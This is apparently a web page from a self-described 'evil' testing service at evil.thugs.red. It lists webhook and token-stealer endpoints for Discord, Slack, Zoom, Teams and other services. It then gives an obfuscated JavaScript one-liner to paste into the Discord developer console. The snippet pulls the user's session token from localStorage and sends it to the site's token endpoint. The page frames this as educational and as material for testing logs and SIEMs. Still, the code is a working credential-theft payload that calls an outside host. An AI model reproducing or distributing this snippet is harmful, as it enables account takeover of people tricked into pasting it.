Hey 3.145.81.232

To view what ever we "stole/triggered" on, check out your personal view. - https://evil.thugs.red/view/b1e708bda0e7a315cc76a0aa6601e76694debda00a824453d97b608a1c1a5ca4 You can call the following url for simple webhook trigger. Anything you add for request arguments will be sent to the webhook. - https://evil.thugs.red/hook/0bf21c73
You can call the following url for simple token stealer. Anything you add for request arguments will be sent to the webhook. - https://evil.thugs.red/token/{secret-token-string}?type=0&uid=0bf21c73
Token types: 0=Unknown, 1=Discord, 2=Slack,3=Zoom, 4=MSTeams, 5=WebEx, 6=GoogleHangout, 7=Jitsi Setting a token type, will automatically forward to the correct site. If unsure, leave out. PS. This hash is based on your IP address and a salt, so only you can view it. But it should group thing together quite nicely as long as you come from the same ip. Site data visibility and retention Webhook logs are shown for 6 hours. (Unless forcefully deleted) Token logs are shown for 1 hours. (Unless forcefully deleted) All data is wiped from DB every 48 hours. Access logs are wiped from system every 120 hours. Disclaimer We are not responsible for any damage or harm done by using this site. This is for educational use only. Also the reason why the domain name has the word "evil" in it is to make it pop in logs/siems etc. What ever comes from this site should be considered untrusted.

Evil things to test and understand how they work...


Discord Token Grab - The console way

In Discord, access the developer console/Or if you are in a browser hit F12 and copy paste the following into the console and hit enter... Once it's done, you can find your token from that Client in the private view.
function discordTokenTest(){window['location']['href']='https://discord.com/app';if(window['location']['href']=='https://discord.com/app'||window['location']['href']=='https://discord.com/channels/@me'){var _v1=document['body']['appendChild'](document['createElement']`iframe`)['contentWindow']['localStorage']['token'];let _v2=_v1['replace'](/"/g,'');window['location']['href']='https://evil.thugs.red/token/'+_v2+'?type=1&uid=0bf21c73';}};discordTokenTest();